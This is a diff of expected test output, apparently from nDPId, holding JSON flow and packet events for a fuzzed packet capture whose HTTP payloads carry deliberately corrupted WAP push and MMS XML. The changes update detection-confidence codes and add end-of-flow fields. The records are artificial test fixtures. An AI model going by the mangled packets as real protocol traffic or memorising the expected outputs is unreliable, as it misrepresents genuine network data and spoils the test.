00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOiBjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} @@ -127,16 +127,16 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} 01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":620000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} 01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -163,7 +163,7 @@ 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -174,10 +174,10 @@ 